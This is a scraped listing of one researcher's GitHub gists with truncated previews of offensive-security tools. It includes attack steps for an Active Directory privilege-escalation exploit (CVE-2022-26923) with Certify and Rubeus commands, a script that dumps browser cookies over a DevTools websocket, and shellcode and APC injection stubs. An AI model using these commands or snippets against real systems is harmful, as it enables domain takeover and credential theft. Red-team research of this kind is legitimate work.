Dominic Chell dmchell
dmchell
/ Program.cs
Created
May 12, 2022 10:41
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923) | |
| // Author: @domchell - MDSec | |
| // This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account | |
| // Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :) | |
| // Steps: | |
| // 1. Escalate on any workstation (hint: krbrelayup ftw) | |
| // 2. Execute UpdateMachineAccount.exe as SYSTEM | |
| // 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp | |
| // 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256) |
dmchell
/ SharpApprover.cs
Created
September 21, 2021 13:49
Reset the mspki-enrollment-flag attribute when you possess a write ACE on a vulnerable certificate template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.DirectoryServices; | |
| namespace SharpApprover | |
| { | |
| class Program | |
| { | |
| public static void SetAdInfo(string objectFilter, | |
| int objectValue, string LdapDomain) |
dmchell
/ getnamedpipes.cs
Created
January 31, 2021 18:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.IO; | |
| using System; | |
| namespace GetNamedPipes | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { | |
| Console.WriteLine("[*] Found the following pipes:"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import ws, asyncdispatch, os | |
| proc query() {.async.} = | |
| var wsurl = paramStr(1) | |
| echo wsurl | |
| var ws = await newWebSocket(wsurl) | |
| await ws.send("{\"id\": 1, \"method\": \"Network.getAllCookies\"}") | |
| echo await ws.receiveStrPacket() | |
| ws.close() |
dmchell
/ shellinjectwithpatch.cs
Last active
June 29, 2021 17:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Windows.Forms; | |
| using System; | |
| using System.Text; | |
| public class cactusTorch | |
| { | |
| [StructLayout(LayoutKind.Sequential)] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Original code created by Casey Smith - https://gist.github.com/subTee/a8d86ee9b9792dac0f0f4b021f2763c1 | |
| // | |
| // Modified and commented by @pwndizzle | |
| // | |
| // To run: | |
| // 1. C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe apc-injection.cs && apc-injection.exe | |
| using System; | |
| using System.Reflection; | |
| using System.Diagnostics; |